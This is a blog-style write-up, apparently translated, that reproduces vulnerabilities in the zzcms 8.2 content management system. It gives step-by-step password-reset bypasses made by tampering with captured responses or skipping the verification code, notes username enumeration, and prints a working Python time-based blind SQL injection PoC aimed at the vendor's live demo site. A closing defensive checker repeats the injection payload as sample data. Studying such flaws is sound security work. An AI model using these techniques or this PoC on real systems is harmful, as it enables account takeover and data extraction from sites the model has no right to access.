00x0 Introduction
I woke up this morning to find that Seebug had published a batch of new vulnerabilities, and a lot of people were already digging into this zzcms8.2 one, so I quietly set off down the road of reproducing it (if I were willing to buy the details, why would I go to all this trouble ~).
Environment: zzcms8.2 (investment-promotion edition)
php-5.4.45
mysql-5.5.53
01x0 Arbitrary user password reset
01x1 Arbitrary user password reset, method one
Strictly speaking, this vulnerability should be titled arbitrary front-end user password reset: the backend administrator password cannot be reset this way, or perhaps that is just a problem with my reproduction.
First register an account, then go to the home page and click "find password".
Address: http://localhost/one/getpassword.php
There is also a username enumeration issue here: if the user exists, the page returns the "correct" status shown above.
Back to the topic: enter the captcha and click Next to go to the next step.
Do not click to get a verification code; type in any number, click Next directly, and capture the request.
Capture the response.
Change No to Yes and forward it; you will find the front-end page does not change.
Then look in the capture tool and you will see this request.
This is obviously the request for a successful verification code; forward it directly.
Enter the new password and reset it directly.
Reset succeeded.
01x2 Arbitrary user password reset, method two
This one is the simplest; there is no need to capture packets at all.
Use the demo site for the test.
Next
You will see this; now do not choose a verification method and do not click to get a verification code, just type any number and click Next directly.
Be sure to do this quickly, otherwise the backend validates it and a red warning like this appears before you click Next.
It jumps straight to the change password page.
02x0 del.php time-based blind injection
This one was posted by a master on FreeBuf; I am only doing a simple analysis.
Http://www.freebuf.com/vuls/161888.html
user/del.php, line 13
Here two POST parameters are taken without any processing and passed straight into the format string.
Line 136.
which goes directly into the query. Here is the master's PoC.
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
import string

# Candidate characters for the value of user(); the visible "@_." suggests the
# set was letters and digits plus "@_." (assumed, the original list is garbled)
payloads = string.ascii_letters + string.digits + "@_."
url = "http://demo.zzcms.net/user/del.php"
user = ''

for i in range(1, 2):
    for payload in payloads:  # iterate over the candidate characters
        start_time = time.time()
        post_data = ("id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),"
                     + str(i) + ",1))=" + str(ord(payload)) + "),sleep(5),1)%23").encode("utf-8")
        response = requests.post(url, timeout=6, data=post_data,
                                 headers={"Content-type": "application/x-www-form-urlencoded"})
        # a response delayed by the sleep() means this character matched
        if time.time() - start_time > 5:
            user = payload
            print('user is: ', user)
            break
print('\n[done] Current user is %s' % user)
```
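As an added illustration (not code from the original post or from the zzcms project), this is the server-side validation the two parameters should have received, written as a checker over constructed request bodies shaped like a legitimate delete and like the PoC above; the table whitelist is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies to user/del.php: one legitimate, one shaped like
# the time-based blind PoC (the tablename value smuggles a WHERE clause).
SAMPLE_BODIES = [
    "id=1&tablename=zzcms_answer",
    "id=1&tablename=zzcms_answer where id = 1 and if((ascii(substr(user(),1,1))=114),sleep(5),1)%23",
]

# Assumed whitelist of tables del.php may legitimately delete from (hypothetical).
ALLOWED_TABLES = {"zzcms_answer", "zzcms_ask"}

# MySQL delay primitives that a time-based blind probe relies on.
TIME_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def check_del_request(body: str) -> dict:
    """Validate one x-www-form-urlencoded body sent to del.php and report findings."""
    params = parse_qs(body, keep_blank_values=True)
    tablename = params.get("tablename", [""])[0]
    id_value = params.get("id", [""])[0]
    findings = []
    # A real table name is a single identifier: no spaces, quotes or comment markers.
    if not re.fullmatch(r"[A-Za-z0-9_]+", tablename):
        findings.append("tablename is not a bare identifier")
    # Even a bare identifier must be one of the tables this script is meant to touch.
    if tablename not in ALLOWED_TABLES:
        findings.append("tablename not in whitelist")
    # id should be cast to an integer before it ever reaches the query.
    if not id_value.isdigit():
        findings.append("id is not an integer")
    if TIME_FUNCS.search(body):
        findings.append("time-delay function in request body")
    return {"tablename": tablename, "suspicious": bool(findings), "findings": findings}


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(check_del_request(body))
```

Run as a request filter, the same checks reject the injected body before it reaches the query; run over stored request logs, they flag past probes.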